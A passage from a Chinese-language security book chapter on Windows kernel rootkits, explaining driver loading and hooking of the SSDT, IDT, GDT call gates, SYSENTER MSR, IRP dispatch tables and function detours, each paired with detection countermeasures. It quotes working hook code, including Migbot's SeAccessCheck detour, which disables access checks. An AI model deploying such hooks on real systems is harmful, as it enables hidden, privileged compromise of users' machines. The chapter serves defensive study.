Rootkit不是从内核启动的,必须有一个用户模式二进制程序或者恶意软件的一部分来初始化装入进程。这个程序通常称为装入程序(loader)。装入程序有多个选项,这取决于其启动的位置(在磁盘上或者直接注入到内存)以及当前使用的账户的权限,可以选择合法地装入、通过选择一个或者多个未写入文档的API函数,或者通过一个利用程序装入。 因为驱动程序是操作系统关键的合法部件,所以操作系统自然允许驱动程序装入。这个装入过程由服务控制管理器(Service Control Manager,SCM)或者services.exe(子进程名为svchost.exe)处理。一般,表现良好的程序将使用Win32 API联络SCM以装入驱动程序。但是,以这种方式装入驱动程序仅能由具有管理员权限的用户进行,而Rootkit在装入期间不总是具备奢侈的管理员权限。当然使用直接内核对象操纵(Direct Kernel Object Manipulation,DKOM)以及其他著名的技术,用户模式恶意软件能够为其进程提升所需的权限并且获得管理员权限。 这样装入一个驱动程序也会创建一个注册表项目,还会留下痕迹。这就是Rootkit一般在装入之后会开始掩盖其踪迹的原因。 20世纪90年代末Greg Hoglund编写的Migbot Rootkit使用了一种方法,涉及一个由NTDLL.DLL输出的未写入文档的Windows API函数ZwSetSystemInformation()。这个函数允许使用任意的模块名将二进制代码装入内存。一旦模块装入,就无法在不重启系统的情况下卸载。这种方法不可靠,而且可能导致系统崩溃,因为驱动程序被装入到可分页的内核内存(也就是,可以被写到磁盘并从内存删除的内核内存)。当驱动程序的代码或者数据处于交换出内存的状态,有些条件下代码或者数据就无法访问。如果企图引用这些内存,系统将会崩溃。 这种表现是操作系统设计的可中断性(interruptibility)原则的结果。为了使系统可中断,它必须推迟当前执行的进程,让位给请求CPU时间的更高优先级的线程。在Windows中,这个概念以中断请求级别(interrupt request level,IRQL)的方式实现。系统可以在任何给定的时间点运行于各种IRQL,在较高的IRQL下,大部分系统服务不被执行。内存管理器的页面错误处理程序就是这样一个服务。因此,如果驱动程序运行于过高的IRQL并且导致一个页面错误(请求之前已被交换出内存的数据或者代码),内存管理器将不运行并且将不会捕捉这个问题。结果是系统缺陷检查(蓝屏)。 值得一提的是,这只是内核驱动程序开发中使人感到极其乏味和危险的许多微妙之处中的一个。大部分应用程序开发人员都习惯于编写有缺陷的代码,因为操作系统在运行时会捕捉他们的错误。在开发内核驱动程序时,开发人员必须记住,可能没有什么能够使系统避免崩溃。 4.4.4 得以执行 作为内核驱动程序装入之后,Rootkit在Windows驱动程序体系结构的规则下操作。它在执行之前必须等待I/O操作发生。这与用户模式进程相反,用户模式进程在工作完成并且自行终止之前一直运行着。内核驱动程序在需要时执行并且在初始化I/O的调用进程的上下文下运行,如果驱动程序是由于中断请求而被调用,则运行在任意的上下文中。 这意味着Rootkit作者必须围绕内核模式规则理解这些执行参数并构造Rootkit。 4.4.5 与用户模式通信 通常,Rootkit有一个作为指挥控制代理的用户模式组件(有时候被称作控制器)。这是因为在前面内容中提到的,必须有些别的程序来执行驱动程序代码。如果Rootkit是独立的,那么本质上是操作系统在驱动Rootkit。用户模式的控制器发送命令给Rootkit并且分析传回的信息。对于隐身的Rootkit,控制器一般在另一台机器上,并且不经常通信以免引起怀疑。控制器也可以是用户模式中的一个单独的睡眠线程,获得在一个应用程序(例如Internet Explorer)中的持续存在。这个线程可以在几种任务中循环,例如,轮询远程站点获取新命令,读取和发出这些命令给Rootkit驱动程序,然后再休眠一段预先设置的时间。 4.4.6 保持隐蔽性和持续性 Rootkit一旦被装入,它就会通过隐藏注册表键值、进程和文件来掩盖踪迹。但是,隐藏正在变得没有必要,因为Rootkit和防Rootkit技术同样在不断进步。恶意代码可以直接注入到内存中,你没有必要使用注册表或者磁盘。 Rootkit能够采取许多措施来获得在系统上的持续存在。这一般包括在多个系统函数及/或服务上安装多个钩子,以及修改注册表在启动时重新装入Rootkit。更高级的Rootkit甚至可以隐藏在更高的内存区域(也就是内核存储),使防病毒软件无法查看,或者隐藏在磁盘未分区的空间。一些Rootkit会感染启动扇区,这样可以在下次系统启动时先于操作系统执行。 4.4.7 方法和技术 在过去的10年中,Rootkit社区已经记录了许多技术。这些技术有的已经有了几十个变种,所以我们将介绍其中使用最广泛的技术。在这些技术的讨论之后,我们将纵览使用这些技术的常见Rootkit实例。 表格钩子 为了进行常规的工作,操作系统必须跟踪几千个对象、句柄、指针和其他数据结构。Windows中常用的数据结构之一是类似于具有行和列的查找表格。Windows是一个任务驱动、对称多进程的操作系统,许多数据结构和表格都是用户模式的应用程序的一部分。几乎所有关键表格都存在于内核模式中,所以对于要修改这些表格和数据结构的攻击者来说,内核驱动程序通常是最佳的方式。我们将关注已经成为内核模式Rootkit常用目标的主要表格。 在所有表格钩子技术中,如果Rootkit希望获得隐蔽性,就必须实施其他隐藏其存在的高级技术。因为简单地读取受影响的表格(SSDT、GDT和IDT)对于检测工具是没有价值的,修改表格而没有掩盖其踪迹的Rootkit可能被轻易地发现。因此,隐身的Rootkit必须竭尽全力地隐藏修改,例如,建立影子表格(保留原始表格的一个冗余副本)。通过监控准备读取修改后表格的应用程序/驱动程序,Rootkit能够很快地将原始表格换回到内存中以愚弄应用程序。这种影子可以使用TLB同步攻击来实现,这种方法在4.5节中描述的Shadow Walker Rootkit中得到应用。 系统服务调度表(SSDT) 谈到与编写和检测Rootkit相关的技术,SSDT可能是Windows操作系统中最广泛地被侵入的数据结构。SSDT是在请求系统服务时引导程序执行流向的机制。系统服务是操作系统提供的功能,在Executive中实现,这在前面已经讨论过。系统服务的例子包括文件操作和其他I/O、内存管理请求以及配置管理操作。简而言之,用户模式程序必须执行内核函数,为此,它们必须有一个迁移到内核模式的方式。SSDT是操作系统用于用户模式请求与系统服务对应关系的查找表格。这整个过程被称作系统服务调度。 系统服务请求的调度方式取决于系统处理器的体系结构。在Pentium Ⅱ和更早的x86处理器上,Windows设置系统服务请求陷阱,这由应用程序调用一个Win32 API函数开始。这个API函数接着使用x86汇编指令INT向处理器发出中断指令并传递值0x2e。当用户模式中的请求应用程序发出INT 0x2E时,操作系统查询中断调度表(IDT)来确定传递0x2E时应该采取什么措施。这个动作由操作系统在启动时进行。当系统在IDT中查找0x2E时,它找到了系统服务调度程序的地址,这个内核模式程序负责将工作传递给相应的Executive服务。然后发生上下文切换,将请求应用程序的执行线程转入内核模式,工作得以进行。 这个过程需要许多内核开销。所以在后来的处理器中,Windows利用更快的SYSENTER指令及相关的寄存器。在启动时,Windows用系统服务调度程序的地址填充SYSENTER寄存器,这样当调度请求发生时(程序发出SYSENTER指令来代替INT 0x2E),CPU立即找到调度程序地址,并进行上下文切换。Windows在x64系统上使用相似的指令SYSCALL。 系统服务调度程序实际引用的查找表格称为KeServiceDescriptorTable,包含了NTOSKRNL.EXE输出的核心Executive功能。实际上有四个服务表,这里我们不做介绍。 现在我们来谈谈内核模式Rootkit如何利用和侵害这个结构。挂钩这个表格的目标是重定向程序执行流向,这样,当用户应用程序(甚至用户模式的系统服务)请求系统调用时,就被重定向到Rootkit驱动程序代码。为了达到这个目的,Rootkit必须挂钩或者重定向需要被挂钩的API函数在SSDT中的对应项。 为了挂钩SSDT中的单独项目,Rootkit作者必须首先在运行时定位结构,这可以多种方式完成: ·通过引用NTOSKRNL.EXE的输出动态地在Rootkit源代码中输入KeServiceDescriptorTable标志。 ·使用ETHREAD结构。每个执行中的线程都有一个指向SSDT的内部指针,这由OS在运行时自动填写。该指针存在于线程的数据结构ETHRAD中一个可预测的偏移量中。这个结构可以由线程调用Win32 API函数PsGetCurrentThread()来获得。 ·查找与OS相关的偏移量来使用内核的进程控制块(kernel's Processor Control Block,KPCB)。 下一步是将这个偏移量放入Rootkit作者希望挂钩的函数的SSDT中。这可以使用公开的源代码,或者反汇编该函数并且寻找第一条MOV EAX,[index]指令手工查找该位置。[index]值引用函数在表格中的索引。注意,这仅对Nt*和Zw*Win32 API函数有效,这两类函数都是调用系统服务调度程序的系统存根程序。下面是一个例子。注意十六进制数124(服务表中的索引)被移入EAX寄存器中,在这个存根调用实际函数时还会验证几个参数。 kd>u 805C03AC nt!NtQueryPortInformationProcess: 805c03ac 64a124010000 mov eax,dword ptr fs:[00000124h] 805c03b2 8b4844 mov ecx,dword ptr[eax+44h] 805c03b5 83b9bc00000000 cmp dword ptr[ecx+0BCh],0 805c03bc 740d je nt!NtQueryPortInformationProcess+0x1f(805c03cb) 805c03be f6804802000004 test byte ptr[eax+248h],4 805c03c5 7504 jne nt!NtQueryPortInformationProcess+0x1f(805c03cb) 805c03c7 33c0 xor eax,eax 805c03c9 40 inc eax 现在我们已经掌握了SSDT位置和Rootkit作者希望挂钩的函数的索引,将索引赋值为Rootkit的重定向函数是很简单的事情,也就是, //SSDT hooking pseudocode KeServiceDescriptorTable[function_offset]=AddrOfRootkitHookingFunction; 然后,在Rootkit驱动程序中,将过滤“真正”的API调用所获得的信息: //Pseudocode for hooking function ReturnValue RootkitHookingFunction(parameters) { ReturnData=ZwHookedFunction(parameters) FilterInformation(ReturnData); Return ReturnData; } Rootkit以这种方式挂钩的常见函数包括NtQuerySystemInformation()和NtCreateFile(),用来隐藏进程和文件。 许多Rootkit使用这种技术,比如He4hook Rootkit.。 SSDT钩子对策 Rootkit在实现SSDT钩子时面对一些挑战。随着OS的修补,Windows经常增加、删除和修改SSDT项目,所以Rootkit作者在试图查找数据结构的设定偏移量时,必须考虑这些变数。在x 64系统上,Windows使用Patchguard来实现更聪明的避免SSDT钩子的方法,在NTOSKRNL.EXE内部的表格在系统启动和运行时都进行检查。而且,大部分防病毒软件、个人防火墙和HIPS解决方案也保护SSDT,一般采用持续监控数据结构修改或者完全限制访问该结构的方式。Kaspersky Anti-Virus实际上是动态地迁移SSDT! 中断调度表(IDT) 中断是操作系统中I/O事务的基本概念。大部分硬件是中断驱动的,也就是在需要服务时发送一个信号给被称为中断请求(IRQ)的处理器。处理器接着查询中断调度表(IDT)查找注册为处理特定IRQ的函数和驱动程序(或者中断服务例程(ISR,Interrupt Service Routine))。这个过程与“系统服务调度表”小节中所讨论的系统服务调度非常相似。一个小的差别是系统上每个处理器都有一个IDT。中断也可以从软件发出,这在前面讨论INT指令时提到过。例如,INT 0x2E通知处理器进入内核模式。 IDT钩子的目标是挂钩已经注册到给定中断的任意函数。低级击键记录程序就是一个例子,通过替换存储在IDT中用于键盘的服务例程,Rootkit可以嗅探和记录击键。 和SSDT钩子技术一样,必须找到IDT以便挂钩,这不难做到。x86指令SIDT在CPU寄存器中存储IDT地址用于读取。在替换所希望的中断的ISR之后,整个表格可以使用x86指令LIDT复制回原来的位置。下面的代码来自Skape,Skape是一个本地的Windows内核模式后门技术的目录(http://www.hick.org/~mmiller/),它演示了这种操作: static NTSTATUS HookIdtEntry( IN UCHAR DescriptorIndex, IN ULONG_PTR NewHandler,OUT PULONG_PTR OriginalHandler OPTIONAL) { PIDT_DESCRIPTOR Descriptor=NULL; IDT Idt; __asm sidt[Idt] Descriptor=&Idt.Descriptors[DescriptorIndex]; *OriginalHandler=(ULONG_PTR)(Descriptor->OffsetLow+ (Descriptor->OffsetHigh<<16)); Descriptor->OffsetLow=(USHORT)(NewHandler&0xffff); Descriptor->OffsetHigh=(USHORT)((NewHandler>\>16)&0xffff); __asm lidt[Idt] return STATUS_SUCCESS; } IDT结构是表现x86 IDT的字段的自定义结构。在第8行中,我们使用x86指令SIDT将当前IDT复制到局部结构,然后存储我们希望挂钩的描述符项目(变量“Descriptor”)。在第10行中,我们合并低16位和高16位得到一个32位的原始ISR地址。接着我们用自己的钩子函数(NewHandler)地址的低16位和高16位设置相应的值。最后,使用x86指令LIDT更新IDT。 IDT对策 Microsoft的Patchguard在64位系统上阻止对这个表格的任何访问,许多开源Rootkit工具(例如,GMER、RootkitRevealer和Ice Sword)都可以发现这些类型的钩子。 全局描述符表(GDT)和局部描述符表(LDT) 全局描述符表(Global Descriptor Table)是按处理器划分的结构,用于保存描述内存区域的地址和访问特权的段描述符。这张表格在每次访问内存时由CPU使用,用于确保执行代码有权访问在段寄存器中指出的内存段。LDT本质上也一样,但是它是按照进程而不是按照处理器划分的。它被单独的进程用于定义进程内部受保护的内存区域。 Rootkit只能使用少数有良好文档的方法来侵害这些表格,但是影响很明显:如果一个Rootkit能够修改GDT,它将全面改变系统上的内存段的执行特权。对LDT的修改仅影响特定的进程。修改这两个表格都使用户模式代码能够装入和执行任何内核模式代码。 与这些表格有关的一种特别著名的技术是安装定制的调用门。调用门本质上是从用户模式代码进入内核模式代码的屏障。在汇编语言级别,如果你发出一个远程JMP或者CALL命令(与局部CALL或者JMP相反,局部调用或者跳转在相同的代码段内,不需要验证),你必须引用GDT或者LDT中已经安装的一个调用门(但是SYSENTER调用支持是处理器固有的,所以不需要调用门或者中断门)。调用门是GDT中的一类描述符,具有4个字段,其中一个是描述符特权级(Descriptor Privilege Level,DPL)。这个字段定义使用调用门所需要的请求代码特权级(也就是Ring 0,Ring 1,Ring 2或Ring 3)。每当执行代码试图使用一个调用门时,处理器都检查DPL。但是,如果打算安装自己的调用门,就可以将DPL设置为任何值。 从内核模式可以使用以下3个API调用中的任何一个轻松地在GDT或者LDT中安装一个调用门: NTSTATUS KeI386AllocateGdtSelectors(USHORT*SelectorArray,USHORT nSelectors); NTSTATUS KeI386ReleaseGdtSelectors(USHORT*SelectorArray,USHORT nSelectors); NTSTATUS KeI386SetGdtSelector(USHORT Selector,PVOID Descriptor); 头两个API函数分别分配和释放GDT中打开的槽(slot),可以把这看做在一个数组结构(因为数组就是一个表格)中分配一个新的索引。一旦分配了槽,KeI386SetGdtSelector()使用提供的描述符填充在指定索引(selector)处的新槽。为了从内核模式安装一个调用门,Rootkit将首先分配一个新槽,然后用引用一个内存段的16位选择符填充该槽。这个内存段将指向Rootkit本身的代码或者其他Rootkit希望让用户模式应用程序访问的其他例程。完成这项工作之后,将允许这个内存段(这是内核模式的内存段)的任何用户模式读或者写请求。 你也可以从用户模式安装调用门,方法之一在《Phrack》杂志的第11卷问题59(http://www.fsl.cs.sunysb.edu/~dquigley/files/vista_security/p59-0x10_Playing_with_Windows_dev(k)mem.txt)中首先提出。这种方法使用直接内核对象操纵(Direct Kernel Object Manipulation,DKOM),在Windows XP Service Pack 2之后已经不再使用。 GDT和LDT对策 Microsoft的Patchguard被配置为在64位系统上监控GDT数据结构,许多开源Rootkit工具,例如,GMER、RootkitRevealer和Ice Sword都可以检测GDT的变化,例如安装调用门。Windows XP Service Pack 2和Windows Server 2003 Service Pack 1之后实施的操作系统修改可阻止DKOM。 特别模块寄存器(Model-Specific Registers,MSR)钩子 MSR是20世纪90年代末在Pentium Ⅱ之后引入的特殊CPU寄存器,用于为操作系统和用户程序提供高级特性。这些特性包括性能的改进,最明显的是我们在本章中已经多次提到的SYSENTER/SYSEXIT指令。因为这些指令用作调用门和其他将代码执行从用户模式转移到内核模式方法的快速替代方案,它们不需要任何参数。为此,操作系统在启动期间填写3个特殊的MSR,在每次发出SYSENTER指令时使用。其中一个寄存器IA32_SYSENTER_IP包含了调用SYSENTER指令之后将会得以执行的内核模块的地址。通过使用Rootkit函数覆盖这个寄存器,内核模式Rootkit可以有效地改变每个系统服务调用的执行流,根据需要拦截和修改信息。这种技术有时被称为SYSENTER钩子,2005年在Jamie Butler开发的Rootkit中首次出现。 因为内核模式代码可以使用x86指令RDMSR和WRMSR读写MSR,Rootkit可以在驱动程序源代码中使用嵌入汇编简单地挂钩SYSENTER: __asm{ mov ecx,0x176//176 is the index into the MSR table for IA32_SYSENTER_EIP rdmsr//read the value of the IA32_SYSENTER_EIP register mov d_origKiFastCallEntry,eax mov eax,MyKiFastCallEntry//Hook function address wrmsr//Write to the IA32_SYSENTER_EIP register } 以上代码来自Butler发布的SysEnterHook概念验证性Rootkit。 MSR对策 MSR恰如其名:特别模块。这意味着在未来它们可能不被支持,Rootkit有很大的可能装入不实现这些寄存器的系统上。发出不受支持的x86指令,这将导致处理器陷阱并且使系统停止。而且,x64系统上的Patchguard监控MSR的篡改。 第三方检测引擎所面对的问题是难以验证IA32_SYSENTER_EIP的目标是合法的。IA32_SYSENTER_EIP应该指向一个未写入文档的内核函数KiFastCallEntry(),这个函数的标志(也就是内存中的地址)位置。因此,检测引擎不知道合法的SYSENTER目标和Rootkit目标之间的差别。 这对于Rootkit作者是个好消息,因为可以花费更少的精力来达到隐身的效果。可以通过多种经过证明的方法来挫败Patchguard(参见http://www.uninformed.org/?v=3&a=3和http://www.uninformed.org/?v=6&a=1)。 I/O请求包(IRP)钩子 本章的驱动程序体系结构部分中讨论过,IRP是内核驱动程序和I/O管理器用来处理I/O的主要数据结构。为了便于内核模式驱动程序处理IRP,I/O管理器第一次初始化驱动程序时,必须初始化其DRIVER_OBJECT数据结构。从DDK的Windows头文件,我们知道在C语言中的结构如下: typedef struct_DRIVER_OBJECT{ CSHORT Type; CSHORT Size; PDEVICE_OBJECT DeviceObject; ULONG Flags; PVOID DriverStart; ULONG DriverSize; PVOID DriverSection; PDRIVER_EXTENSION DriverExtension; UNICODE_STRING DriverName; PUNICODE_STRING HardwareDatabase; struct_FAST_IO_DISPATCH*FastIoDispatch; PDRIVER_INITIALIZE DriverInit; PDRIVER_STARTIO DriverStartIo; PDRIVER_UNLOAD DriverUnload; PDRIVER_DISPATCH MajorFunction[IRP_MJ_MAXIMUM_FUNCTION+1]; }DRIVER_OBJECT; typedef struct_DRIVER_OBJECT*PDRIVER_OBJECT; 我们关注MajorFunction字段(结构中的最后一个字段),它确实像一张表格。每个驱动程序必须用指向处理驱动程序所连接到的设备的IRP的内部函数的指针来填写这个表格。这些函数称为调度例程,每个驱动程序都具有这些函数,它们的任务就是处理IRP。 那么I/O管理器如何知道在哪里管理这些IRP?每个IRP包含了“主功能代码”,这些代码告诉驱动程序堆栈里的驱动程序IRP的存在原因。这些功能代码包括: ·IRP_MJ_CREATE 这个IRP因为初始化一个创建操作而存在。例如,为文件系统驱动器链创建一个新文件。 ·IRP_MJ_READ 这个IRP因为初始化一个读操作而存在。 ·IRP_MJ_WRITE 这个IRP因为初始化一个写操作而存在。 ·IRP_MJ_DEVICE_CONTROL 这个IRP因为特定设备类型发出的系统定义或者自定义IOCTL(I/O控制代码)而存在。 特定设备(例如,一个逻辑卷)的驱动程序链中的每个驱动程序在IRP沿驱动程序链下传的时候对其进行检查,决定对IRP做何操作:无操作;做一些处理并/或完成处理;或者继续传递。实际的工作在驱动程序定义用于处理每个类型的主功能代码的调度例程中完成,这些例程负责所有连接到驱动程序的设备。 那么,Rootkit如何能挂钩驱动程序的主函数表?在我们回答这个问题之前,你必须理解驱动程序为什么这么做。理由就是隐蔽性。Rootkit作者可以很轻松地编写一个驱动程序,将其连接到设备栈,并开始检查IRP,但是这么做没有隐蔽性。Rootkit驱动程序应该向系统注册,出现在许多操作系统管理列表中,但这样很容易被其他人发现。挂钩另一个驱动程序的主函数表还能使Rootkit主驱动程序看上去似乎是良性的,因为临时的检查者会看到这个驱动程序没有连接到任何设备栈。但是实际上它从设备链中接受IRP,因为它已经挂钩了另一个驱动程序的主函数表。最后一个原因是如果你连接到一个设备,你的Rootkit驱动程序在设备释放时必须卸载! Windows中TCP/IP的主函数表上的钩子的一个实例可以参见Greg Hoglund的《IRP Hooking and Device Chains》(IRP钩子和设备链,http://www.Rootkit.com/newsread.php?newsid=846): NTSTATUS InstallTCPDriverHook() { NTSTATUS ntStatus; UNICODE_STRING deviceTCPUnicodeString; WCHAR deviceTCPNameBuffer[]=L"\\Device\\Tcp"; pFile_tcp=NULL; pDev_tcp=NULL; pDrv_tcpip=NULL; RtlInitUnicodeString(&deviceTCPUnicodeString,deviceTCPNameBuffer); ntStatus=IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA,&pFile_tcp,&pDev_tcp); if(!NT_SUCCESS(ntStatus)) return ntStatus; pDrv_tcpip=pDev_tcp->DriverObject; OldIrpMjDeviceControl=pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; if(OldIrpMjDeviceControl) InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction [IRP_MJ_DEVICE_CONTROL],(LONG)HookedDeviceControl); return STATUS_SUCCESS; } 第3行显示了我们感兴趣的设备:TCP设备—Windows TCP/IP栈tcpip.sys所揭示的设备。API调用IoGetDeviceObjectPointer()得到一个TCP设备句柄,我们将其赋给变量pDev_tcp。这个变量实际上是PDEVICE_OBJECT结构,我们所感兴趣的子字段是tcpip.sys的DRIVER_OBJECT数据结构。我们把这个对象赋给pDrv_tcpip变量。现在我们所需要做的是提取主功能代码(保存供以后使用)并将其赋值为Rootkit调度例程。我们使用InterlockedExchange()API同步对DRIVER_OBJECT对象的访问。注意,这个样例函数挂钩tcpip.sys主功能代码IRP_MJ_DEVICE_CONTROL,这个代码处理驱动程序发送/接收的IOCTL。我们也可以同样简单地挂钩IRP_MJ_CREATE以监视新创建的TCP对话。 这种类型的钩子的隐蔽性仅和Rootkit作者使用的实现方法相同。如果作者选择使用OS例程和进程注册挂钩的驱动程序和设备,I/O管理器和对象管理器中将出现容易被发现的踪迹。Greg Hoglund建议的一种高级技术具有极高的隐蔽性,就是简单地挂钩用于大部分驱动程序都完全没有注册的主功能代码的默认OS完成例程。例如,没有实现即插即用(PnP)功能的WDM驱动程序不会为那些主功能代码(IRP_MJ_PNP)指定回调程序。因此OS中默认的处理程序将会完成这个IRP。因为许多驱动程序不会实现多种主功能,挂钩这个默认处理程序的Rootkit能够读取I/O管理器传入和传出的许多信息,而不必注册为驱动程序。相似地,隐蔽的IRP钩子Rootkit不使用OS提供的原生API函数在设备/驱动程序链中注册,而是为必需的DEVICE_OBJECT和DRIVER_OBJECT结构分配核心内存,并且人工修改自己所需要的链,添加一个指向新创建的数据结构的指针。这样,OS不会注意到链中有新的对象,任何遍历表格的检测程序都会错过这些钩子Rootkit。 I/O请求包钩子对策 这种类型的活动一般会被已经装入到内核模式进行监控的个人防火墙和HIDS/HIPS捕获。在意完整性的驱动程序应该实现一个回调例程,定期检查自己的功能表以确定所有功能项都指向内部函数。本书的防Rootkit技术部分(见第10章)中介绍的许多技术和免费工具能够检测这种类型的活动。 映像修改 映像修改涉及对程序本身的二进制代码的编辑,不管这些程序存在于磁盘还是内存。虽然这两种形式相似,但是磁盘上的二进制代码与内存中的有很大不同。不过映像(文本、代码、可重定位等)的主要部分相同。我们将只考虑内存中的映像修改,因为这与内核模式Rootkit最为相关。 映像修改的概念常见于用户模式Rootkit,因为导入地址表(Import Address Table,IAT)钩子技术可以移植到所有PE格式的可执行文件中。但是,这里我们将讨论的是两个内核模式Rootkit使用的更具隐蔽性的方法:detours和内联钩子(inline hook)。 detours/patches(修补)和内联钩子这三个术语所指的都是相同的基本思路。Microsoft在1999年最早称之为detour(http://research.microsoft.com/pubs/68568/huntusenixnt99.pdf),所以我们从现在起使用这个术语。前述的3种方法的目标都相同:覆盖二进制映像中的代码块以重定向程序执行流。detours和patches一般指修改二进制代码中一个函数的前几个字节(被称为函数序言(function prologue))。这样的修补实际上是挂钩整个函数。一个序言由设置使函数能够正常执行的堆栈和CPU寄存器的汇编语言代码组成。函数尾声(epilogue)正相反,它弹出堆栈项目并且返回。这两个结构与程序代码中采用的由编译器实现的调用惯例相关。 内联修补(inline patch)所做的事情也相同,但是它所覆盖的不是序言部分,而是函数体的其他地方。不管开发或者发现这种修补,都比detours要难得多,这是因为存在字节对齐、反汇编指令以及对原始函数完整性和功能性的保持(这些在修补之后要恢复以保持隐蔽性)等问题。 detour一般用JMP或者CALL指令的一个变种覆盖序言,但是实际的指令和参数取决于所涉及的体系结构以及处理器所运行的内存访问模式(x86支持保护模式、实模式和虚拟模式)。这是该技术的难点和对可移植性的影响。不同指令集中指令的尺寸也不同,CPU制造商对于x86指令的操作码(opcode,“operation code”的缩写)也各有不同。所有这些细微之处在开发detour时造成了差别。如果detour没有正确地实现,所生成的控制流可能立刻影响到系统的稳定性。 detour针对一个函数,修补和覆盖函数序言,跳转到detour自己的函数。这时,detour可以进行预先处理,例如,修改原始函数的参数。然后,detour的函数调用所谓的蹦床(trampoline)函数,这个函数调用未经修改的原始函数(传递所有修改过的参数)。原始函数完成其设计功能并且返回detour函数,接着执行一些后期处理工作(例如,修改原始函数结果,为了文件隐藏,可能需要删除某些项目)。 编写一个detour是非常乏味的工作。detour必须对每个需要修补的函数(目标)进行定制。如果目标在操作系统修补或者更新之后出现了变化,detour就必须重做。 因此,开发detour的第一步是研究目标函数。我们将简单地看一下Greg Hoglund的Migbot Rootkit是如何修补SeAccessCheck()函数,以便有效地禁用Windows安全令牌的。为了研究SeAccessCheck()函数,我们可以使用WinDbg的反汇编命令(U)。Migbot依靠下面的SeAccessCheck函数序言: 55 PUSH EBP 8BEC MOV EBP,ESP 53 PUSH EBX 33DB XOR EBX,EBX 385D24 CMP[EBP+24],BL 在上面的输出中,每行开始的数字是对操作码右边的反汇编形式指令进行编码的二进制操作码。Migbot使用这个输出中的操作码创建一个SeAccessCheck的二进制特征码。Migbot所做的第一件事是验证SeAccessCheck中存在这些特征码。如果特征码不存在,它就不尝试修补该函数。进行这个特征码检查的函数如下: NTSTATUS CheckFunctionBytesSeAccessCheck() { int i=0; char*p=(char*)SeAccessCheck; char c[]={0x55,0x8B,0xEC,0x53,0x33,0xDB,0x38,0x5D,0x24}; while(i<9) { DbgPrint("-0x%02X",(unsigned char)p[i]); if(p[i]!=c[i]) { return STATUS_UNSUCCESSFUL; } i++; } return STATUS_SUCCESS; } 如果这个函数成功,那么Migbot尝试修补SeAccessCheck。现在,在进行修补时必须有某个调用函数。my_function_detour_seaccesscheck函数将是detour修补的目标: SeAccessCheck: __declspec(naked)my_function_detour_seaccesscheck() { __asm { push ebp mov ebp,esp push ebx xor ebx,ebx cmp[ebp+24],bl _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } } 让我们来看看这个函数做了什么。它完全由内联汇编组成,并且声明为裸(naked)函数(没有函数序言或者堆栈操作),这样可以最小化恢复CPU寄存器、标志和其他堆栈信息的开销。第一块指令从push ebp到cmp[ebp+24,bl看上去应该很熟悉——它们和被覆盖的SeAccessCheck完全相同。这就是detour的“蹦床”位置;它将堆栈设置为SeAccess-Check。汇编指令的最后一块是强制C编译器生成一个到地址0x08:0xAAAAAAAA的长跳转指令(操作码0xEA)的emit指令。这个地址只是个无用的占位符,在运行时将被替换为真正的目标地址(因为我们不可能预先知道这个地址)。这个关键的步骤由实际进行修补操作的Migbot函数来执行,这个函数叫做DetourFunctionSeAccessCheck(): VOID DetourFunctionSeAccessCheck() { //save a pointer to the real SeAccessCheck char*actual_function=(char*)SeAccessCheck; char*non_paged_memory; unsigned long detour_address; unsigned long reentry_address; int i=0; //these opcodes are what we will patch into SeAccessCheck //notice the 0x11223344 address,which we will need to replace //dynamically with the real address of our detour function char newcode[]={0xEA,0x44,0x33,0x22,0x11,0x08,0x00,0x90,0x90}; //after jumping into our detour function,we will need //some way to get back to SeAccessCheck-since we know we //overwrote 9 bytes,we will set our return address to be //9 bytes after the start of SeAccessCheck reentry_address=((unsigned long)SeAccessCheck)+9; non_paged_memory=ExAllocatePool(NonPagedPool,256); //this loop copies our detour function into nonpaged kernel memory for(i=0;i<256;i++) { ((unsigned char*)non_paged_memory)[i]= ((unsigned char*)my_function_detour_seaccesscheck)[i]; } //here's where we get the address to replace the fake //placeholder address of 0x11223344 with the real address //of our detour function we just copied into memory detour_address=(unsigned long)non_paged_memory; //now paste that address into our opcodes *((unsigned long*)(&newcode[1]))=detour_address; //now loop over our detour function code and replace //the other placeholder address 0xAAAAAAAA with our //re-entry address so we can jump back to SeAccessCheck for(i=0;i<200;i++) { if((0xAA==((unsigned char*)non_paged_memory)[i])&& (0xAA==((unsigned char*)non_paged_memory)[i+1])&& (0xAA==((unsigned char*)non_paged_memory)[i+2])&& (0xAA==((unsigned char*)non_paged_memory)[i+3])) { *((unsigned long*)(&non_paged_memory[i]))=reentry_address; break; } } //now patch 9 bytes of SeAccessCheck! for(i=0;i<9;i++) actual_function[i]=newcode[i]; } 各个步骤的详细解释请见代码中的注释。执行这个函数之后,SeAccessCheck得以修补。 最后要指出的一点是在Migbot发布之后SeAccessCheck的代码已经改变。下面的WinDbg输出中显示的第一个代码块和以前有了很大的不同。因此Migbot中的detour对这个版本的SeAccessCheck无效。 kd>u 805e5858 nt!SeAccessCheck+0x10: 805e5858 a900000002 test eax,2000000h 805e585d 740b je nt!SeAccessCheck+0x22(805e586a) 805e585f 8b4d20 mov ecx,dword ptr[ebp+20h] 805e5862 25fffffffd and eax,0FDFFFFFFh 805e5867 0b410c or eax,dword ptr[ecx+0Ch] 805e586a 0b4518 or eax,dword ptr[ebp+18h] 805e586d 8b4d28 mov ecx,dword ptr[ebp+28h] 805e5870 8901 mov dword ptr[ecx],eax Microsoft研究所仍然在http://research.microsoft.com/en-us/projects/detours/维护detours程序(免费的开源版本名为Detours Express 2.1)。这个程序可以作为你自用的稳定detour/patch程序库。 detours对策 detours可以通过比较已知完好的版本的二进制代码和装入到内存的代码段检测到,任何的不同都表示出现了篡改,System Virginity Verifier(SVV)之类的工具使用这种方法。这种方法的明显局限性是,如果攻击者同时修补内存映像和磁盘映像,这种方法将会失败。函数的hash值也可以用于验证它是否改变,但是因为Microsoft总是在修补它的函数,hash也就总是在改变,所以这种方法也可能造成假阳性。 发现detour的一个更常用的方法是尝试反汇编头几个字节的函数序言,确定是否发出CALL或者JMP指令。如果有这样的指令,函数就有可能修补过。这种方法会在操作系统合法修补的函数上产生假阳性。实际上,Microsoft已经通过使其代码具有一个5个字节的序言来达到可以热修补的目的,这个序言很容易使用1个字节的JMP/CALL指令和一个32位(4字节)地址覆盖。这对于Microsoft开发人员来说是有用的,当函数中发现缺陷时,可以发布一个补丁,覆盖有缺陷函数的序言,使其跳转到新版本的函数(这个函数存在于补丁的二进制代码中)。 